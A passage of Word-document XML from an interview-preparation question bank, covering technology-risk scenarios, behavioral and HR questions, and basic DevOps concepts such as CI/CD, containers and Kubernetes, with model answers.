        </w:rPr>
        <w:t>A: Assess actual exposure first - who had access to the backup storage location during that window, and was there any evidence of unauthorized access, since that determines whether this is a control gap or an actual data incident requiring breach notification. Remediate immediately by encrypting existing backups and enabling encryption-by-default on the backup pipeline going forward, and disclose the finding transparently to audit/compliance with a remediation timeline rather than downplaying the exposure window. Prevent recurrence by adding an automated policy check (e.g. organization policy or a scheduled compliance scan) that alerts on any unencrypted storage resource, so this class of gap is caught by tooling instead of an annual audit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Technology Risk - Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1716. Executive reporting: How would you present a deteriorating risk trend to senior leadership and ask for investment or policy support?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Lead with business impact in plain language (what could go wrong and what it would cost, not technical jargon), show the trend visually over time so the deterioration is obvious, and be specific about the ask - exact investment amount, headcount, or policy change needed and what it will fix. Close with a clear recommendation and a timeline for consequences if no action is taken, so leadership has a concrete decision to make rather than a vague warning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1717. Decision-making: Tell me about a time you had incomplete information but still had to make or recommend a risk decision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Structure this as a specific example: describe the situation and what information was missing, explain how you assessed the available evidence and consulted the right stakeholders to fill gaps where possible, state the decision you made or recommended and the reasoning (including what risk you consciously accepted), and close with the outcome and what you'd do differently next time. Interviewers want to see a defensible reasoning process, not a claim that you always have perfect information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1718. Audit partnership: How would you handle a disagreement with internal or external auditors about severity, evidence, or remediation feasibility?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start from a collaborative stance - understand the auditor's framework and evidence standard, and present your counter-evidence or context clearly rather than pushing back defensively. If genuine disagreement remains, escalate through the proper channel (risk committee, audit liaison) with both positions documented, and be willing to accept a finding even if you disagree with severity while negotiating a realistic remediation timeline that reflects actual operational constraints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1719. Leadership reflection: What does success look like for you in a Technology Risk Lead role after six months?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A credible answer covers: a functioning risk register and heatmap that leadership actually uses in decisions, measurable reduction in overdue high-severity findings, established trust and working relationships with engineering/security/product so risk is raised early rather than discovered late, and at least one automated control or reporting improvement shipped rather than only manual processes. The emphasis should be on embedding risk thinking into how teams already work, not adding a parallel bureaucracy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1720. Scenario - failed access review: An access recertification review reveals 12 terminated employees still have active production access. How do you respond and remediate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Revoke access for all 12 accounts immediately - this is the urgent action regardless of root cause investigation timing. Then check whether any of the accounts were used after the termination date to determine if this is a stale-access finding or an active incident requiring deeper investigation and possibly breach notification. Root-cause the process gap (usually a broken offboarding trigger between HR systems and IAM) and fix the integration or add a compensating automated control - a scheduled job that cross-references active directory/IAM accounts against HR termination records daily - so this doesn't rely on a periodic manual review to catch it months later.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1721. Scenario - conflicting risk appetite: Business wants to launch a feature that Security rates as high risk. How do you drive the decision to resolution?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Get both sides' reasoning into a shared, concrete format rather than a values debate - quantify the specific risk (what could go wrong, likelihood, business impact if it materializes) and the specific cost of delay (revenue, competitive timing) so the decision-makers are comparing real numbers, not vague positions. Look for a middle path first - a scoped launch, compensating control, or phased rollout that reduces the risk enough to proceed - and if no compromise closes the gap, escalate to whoever owns risk acceptance authority (typically a risk committee or an accountable executive) with both positions documented, since resolving genuine risk-appetite conflicts is a governance decision, not something to settle by whoever argues harder.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>HR / Behavioral Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1722. Explain your current role and day-to-day responsibilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Describe your role in terms of ownership and impact, not just a task list - what systems or platforms you own, what decisions you're trusted to make independently, and what a typical week actually looks like (e.g. a mix of production support, infrastructure design work, and cross-team collaboration). Include one or two concrete recent examples so the answer feels grounded in real work rather than a generic job-description summary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1723. Why do you want to switch your current job?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Frame this around what you're moving toward, not what you're running from - growth opportunities, technical challenges, or scope you're seeking that your current role doesn't offer - rather than criticizing your current employer or team. Being specific about what attracted you to this particular opportunity (not just 'a change') signals genuine intent rather than generic job-hunting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1724. Why do you want to work at a product-based company specifically?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer connects to real differences in how product companies work - owning a product end-to-end and seeing the long-term impact of engineering decisions, being closer to the customer and business outcomes, and typically deeper technical ownership versus a services/consulting model where you rotate across client projects. Ground it in what you specifically want more of (technical depth, ownership, product impact) rather than a generic statement that sounds rehearsed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1725. What is the most challenging problem you have faced in your career, and how did you handle it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pick a genuinely significant, specific problem (a major incident, a difficult migration, a technical decision with real tradeoffs) and structure the answer around situation, the actions you specifically took, and the measurable outcome - being honest about difficulty and what you learned lands better than a story where everything went smoothly. Avoid vague or overly broad answers; specificity is what makes this answer credible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1726. What are your strengths and weaknesses?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For strengths, pick 1-2 genuinely relevant to the role with a concrete example proving each, rather than a generic list of adjectives. For weaknesses, choose something real and specific (not a disguised strength like 'I work too hard') and pair it with what you're actively doing to improve it - self-awareness plus a concrete improvement plan is what interviewers are actually listening for.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1727. Where do you see yourself in 3 years?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Describe a realistic trajectory of growing technical depth and scope (e.g. moving from individual execution to technical leadership across a bigger platform or team) that's consistent with the role you're interviewing for, showing you've thought about your own growth without sounding like you'll be bored in the role or planning to leave quickly. Anchoring it to the kind of work this specific company/role would let you do makes the answer feel genuine rather than generic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1728. What are the areas you do not know well or have not worked on yet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Answer honestly with something genuinely true but not disqualifying for the role, and immediately follow it with what you're doing to close that gap (a course, a side project, hands-on exposure you're seeking) - this shows self-awareness and growth mindset rather than either false modesty or a hidden major gap. Avoid claiming you have no weak areas, which reads as lacking self-awareness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1729. What is the difference between theoretical knowledge and real-time, hands-on production experience, and how do you bridge that gap?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Theoretical knowledge is understanding how something is supposed to work; real-time production experience is knowing how it actually behaves under real load, real failure modes, and real operational constraints that documentation rarely covers - the gap shows up in things like knowing a retry pattern exists versus having debugged what happens when retries themselves cause a cascading failure. Bridge it by seeking hands-on exposure deliberately - side projects, on-call rotations, shadowing incidents - rather than relying on reading alone, and be honest in interviews about which of your knowledge is battle-tested versus studied.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1730. Have you worked independently on a project, or always as part of a team? Describe an example.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Give a specific example showing both modes if you have them - a project you owned end-to-end independently (design decisions, execution, and outcome all yours) and one where you contributed as part of a larger team effort, calling out what you specifically contributed in the team scenario so it doesn't sound vague. Being able to speak concretely to both shows range, since senior roles typically require both independent ownership and collaborative execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1731. What would you do if an automation script you wrote failed or caused an unintended change in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First, contain and mitigate the impact immediately - stop the script if it's still running, assess what actually changed, and roll back or fix the unintended change as fast as possible, prioritizing restoring correct state over understanding root cause in the moment. Afterward, do a proper root-cause analysis of why the script behaved unexpectedly (missing validation, an untested edge case, insufficient dry-run testing) and add the specific safeguard - better input validation, a dry-run mode, smaller blast-radius rollout - that would have caught it, treating it as a concrete process improvement rather than just a one-off mistake.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Basic / One-Liner Concepts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1732. What is DevOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DevOps is a culture and set of practices that combines software development and IT operations to shorten the delivery lifecycle, using automation, CI/CD, and shared ownership so teams can build, test, and release software faster and more reliably.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1733. What is a DevOps Engineer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A DevOps Engineer is someone who builds and operates the automation, infrastructure, and pipelines that let development and operations work as one flow - owning CI/CD, IaC, monitoring, and reliability rather than just writing application features or just keeping servers up.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1734. What is the difference between DevOps and Agile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Agile is a software development methodology focused on iterative planning and delivering working software in short cycles with close customer collaboration; DevOps extends that further downstream into deployment and operations, focused on automating build/test/release/monitor so those iterations actually reach production quickly and reliably - Agile answers 'how do we plan and build,' DevOps answers 'how do we ship and run it.'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1735. What is Configuration Management?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Configuration Management is the practice of defining and enforcing a consistent, known state for servers and infrastructure (installed packages, config files, running services) through automation tools like Ansible, Puppet, or Chef, instead of manually configuring each machine and letting them drift apart over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1736. What is CI/CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CI/CD (Continuous Integration / Continuous Delivery or Deployment) is a software development practice that automates the process of building, testing, and releasing applications.</w:t>
        <w:br/>
        <w:t>1. Continuous Integration (CI)</w:t>
        <w:br/>
        <w:t>Developers frequently merge their code changes into a shared repository. Whenever code is committed:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Code is automatically built.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Automated tests are executed.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Code quality and security checks are performed.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Issues are detected early.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve"> A developer pushes code to GitHub. A pipeline in Jenkins or GitHub Actions automatically runs unit tests and validates the code.</w:t>
        <w:br/>
        <w:t>2. Continuous Delivery (CD)</w:t>
        <w:br/>
        <w:t>After CI is successful, the application is automatically prepared for deployment.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Packages or Docker images are created.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Artifacts are stored in repositories.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Deployment to staging environments is automated.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Production deployment still requires manual approval.</w:t>
        <w:br/>
        <w:t>3. Continuous Deployment (CD)</w:t>
        <w:br/>
        <w:t>An extension of Continuous Delivery where every successful change is automatically deployed to production without manual intervention.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Typical CI/CD Pipeline</w:t>
        <w:br/>
        <w:t>Developer Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Source Control (GitHub/GitLab)</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Build Application</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Run Tests</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Security &amp; Quality Checks</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Build Docker Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Push to Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Deploy to Kubernetes/GKE/EKS</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Monitor Application</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster software releases</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduced manual effort</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Early bug detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Consistent deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Improved software quality</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster feedback to developers</w:t>
        <w:br/>
        <w:t>Common CI/CD Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Jenkins</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitHub Actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitLab CI/CD</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Azure DevOps</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Argo CD</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Tekton</w:t>
        <w:br/>
        <w:t>Interview Answer (1-Minute)</w:t>
        <w:br/>
        <w:t>CI/CD stands for Continuous Integration and Continuous Delivery/Deployment. CI is the practice of automatically building and testing code whenever developers commit changes to a shared repository. CD automates the release process by packaging and deploying the application to staging or production environments. The main goal of CI/CD is to deliver software faster, more reliably, and with fewer errors through automation. In my projects, I have used tools like Jenkins, GitHub Actions, Terraform, Docker, and Kubernetes to automate build, test, and deployment workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1737. What is the difference between Continuous Delivery and Continuous Deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Continuous Delivery means every change that passes the pipeline is automatically packaged and ready to release, but a human still triggers the actual production release; Continuous Deployment goes one step further and releases every passing change to production automatically with no manual gate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1738. What is a virtual machine (VM), and how does it differ from a container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A VM virtualizes hardware and runs a full guest operating system on top of a hypervisor, giving strong isolation but at the cost of more memory/CPU overhead and slower startup; a container virtualizes at the OS level, sharing the host kernel and packaging only the application and its dependencies, making it far lighter and faster to start than a VM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1739. What is a container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A container is a lightweight, isolated unit that packages an application with all its dependencies and runs using the host OS's kernel, giving process-level isolation without the overhead of a full virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1740. What is a Dockerfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Dockerfile is a text file with a sequence of instructions (FROM, COPY, RUN, CMD, etc.) that Docker reads to build a container image layer by layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1741. How does a multi-stage Docker build work, and what problem does it fix?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A multi-stage build uses multiple FROM statements in one Dockerfile, where an early stage (e.g. a full SDK image) compiles or builds the application, and a later, much smaller final stage (e.g. a minimal or distroless base) copies over only the compiled artifact using COPY --from=&lt;stage&gt;. It fixes bloated production images - build tools, compilers, and source code needed only to produce the artifact never end up in the final image, drastically cutting image size and attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1742. What is Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is</w:t>
        <w:br/>
        <w:t>Kubernetes</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>Kubernetes (often called K8s) is an open-source container orchestration platform used to deploy, manage, scale, and automate containerized applications.</w:t>
        <w:br/>
        <w:t>It was originally developed by Google and is now maintained by the Cloud Native Computing Foundation.</w:t>
        <w:br/>
        <w:t>Simple Definition</w:t>
        <w:br/>
        <w:t>If Docker helps you run containers, Kubernetes helps you manage thousands of containers across multiple servers automatically.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Kubernetes is Used</w:t>
        <w:br/>
        <w:t>Kubernetes solves problems like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automatically deploying applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scaling applications up/down based on traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Restarting failed containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancing traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Managing networking and storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rolling updates without downtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Self-healing infrastructure</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core Idea</w:t>
        <w:br/>
        <w:t>A Kubernetes cluster consists of:</w:t>
        <w:br/>
        <w:t>Control Plane (Master)</w:t>
        <w:br/>
        <w:t>Manages the cluster and scheduling.</w:t>
        <w:br/>
        <w:t>Worker Nodes</w:t>
        <w:br/>
        <w:t>Machines where application containers run.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important Kubernetes Components</w:t>
        <w:br/>
        <w:t>Component</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Smallest deployable unit</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Worker machine</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manages Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Service</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Exposes applications</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Namespace</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Logical isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ConfigMap</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stores configuration</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Secret</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stores sensitive data</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Ingress</w:t>
        <w:br/>
        <w:tab/>
        <w:t>HTTP/HTTPS routing</w:t>
        <w:br/>
